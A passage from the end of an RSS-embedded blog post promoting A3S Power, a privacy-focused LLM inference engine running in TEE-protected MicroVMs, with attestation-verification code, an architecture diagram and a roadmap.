  &lt;span class="nt"&gt;--model&lt;/span&gt; llama3.2:3b &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--expected-hash&lt;/span&gt; sha256:a1b2c3d4e5f6...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or use the SDK:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;a3s_power_verify&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;verify_report&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;VerifyOptions&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;report&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;fetch_attestation&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nf"&gt;verify_report&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;report&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;VerifyOptions&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;expected_model_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;expected_hash&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;expected_measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;known_measurement&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;hardware_verifier&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;Some&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;amd_kds_verifier&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;// Verification passed, safe to send inference requests&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Position in the A3S Ecosystem
&lt;/h3&gt;

&lt;p&gt;A3S Power is the inference engine of the A3S privacy-preserving AI platform, running inside the a3s-box MicroVM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──────────────────────────────────────────────────────────────────┐
│                         A3S Ecosystem                             │
│                                                                   │
│  ┌──────────────────────────────────────────────────────────┐    │
│  │  a3s-box MicroVM (AMD SEV-SNP / Intel TDX)               │    │
│  │  ┌────────────────────────────────────────────────────┐  │    │
│  │  │  a3s-power                                         │  │    │
│  │  │  OpenAI API ← Vsock/RA-TLS → Host                 │  │    │
│  │  └────────────────────────────────────────────────────┘  │    │
│  │  Hardware-encrypted memory — host cannot read             │    │
│  └──────────────────────────────────────────────────────────┘    │
│       ▲ Vsock                                                     │
│       │                                                           │
│  ┌────┴─────────┐  ┌──────────────┐  ┌────────────────────────┐  │
│  │  a3s-gateway │  │  a3s-event   │  │  a3s-code              │  │
│  │  (API routing│  │  (event bus) │  │  (AI coding agent)     │  │
│  └──────────────┘  └──────────────┘  └────────────────────────┘  │
│                                                                   │
│  Client:                                                          │
│  ┌──────────────────────────────────────────────────────────┐    │
│  │  a3s-power verify SDK                                     │    │
│  │  Nonce binding · Model hash binding · Hardware sig verify │    │
│  └──────────────────────────────────────────────────────────┘    │
└──────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Relationship with Power&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-box&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Hosts Power inside TEE MicroVM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-code&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Uses Power as local inference backend&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-gateway&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Routes inference requests to Power instances&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;a3s-event&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Distributes inference events&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;verify SDK&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Client attestation verification&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Technical Roadmap
&lt;/h3&gt;

&lt;p&gt;Three things in progress:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Expanding TEE hardware support&lt;/strong&gt; — Intel TDX support is already reserved in the architecture (&lt;code&gt;TeeType::Tdx&lt;/code&gt; variant defined, ioctl calls implemented). ARM CCA (Confidential Compute Architecture) is on the longer-term roadmap&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU TEE acceleration&lt;/strong&gt; — AMD SEV-SNP now extends to confidential GPUs, which means A3S Power's multi-backend architecture can upgrade seamlessly: the same security layer plus a GPU-accelerated backend can raise inference throughput by an order of magnitude or more while keeping hardware-level privacy protection. picolm solves the "can it run" problem; GPU TEE backends solve the "how fast can it run" problem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deeper ecosystem integration&lt;/strong&gt; — Tighter integration with a3s-box MicroVM to automate TEE deployment workflows. Integration with the a3s-code AI coding agent framework to let AI Agents reason under TEE protection&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;Back to the opening scenario. The client portfolio and trading-strategy information the trader typed passed, from the moment it left the keyboard, through the RA-TLS attestation handshake, TEE hardware memory encryption, model identity verification, layer-streaming inference, log redaction, and memory zeroing — every step backed by cryptographic guarantees, none depending on anyone's goodwill.&lt;/p&gt;

&lt;p&gt;And inside the TEE, that 10B model isn't just answering the trader's question. It is doing three things at once: checking the prompt for injection attacks, redacting client information and position data from the results it returns, and gating any sensitive tool calls the response might trigger. These security decisions must be made inside hardware-encrypted memory, by a model smart enough to make them — and picolm's layer-streaming inference, which lets a 256MB EPC run a 10B model, is what makes that possible.&lt;/p&gt;

&lt;p&gt;This isn't "we promise not to look at your data." This is "even if we wanted to look, the hardware won't allow it."&lt;/p&gt;

&lt;p&gt;858 tests guard the correct implementation of these technical choices. The pure-Rust minimal TCB (~1,220 dependency-tree lines) keeps the inference path fully auditable. And for users, the experience stays as simple as Ollama: send a request, get a result.&lt;/p&gt;

&lt;p&gt;The difference is: this time, you don't need to trust anyone. And you don't need an expensive server — a $10 piece of hardware with 256MB of memory is enough.&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;A3S Power — A Privacy LLM Inference Engine on $10 Hardware.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>os</category>
    </item>
  </channel>
</rss>
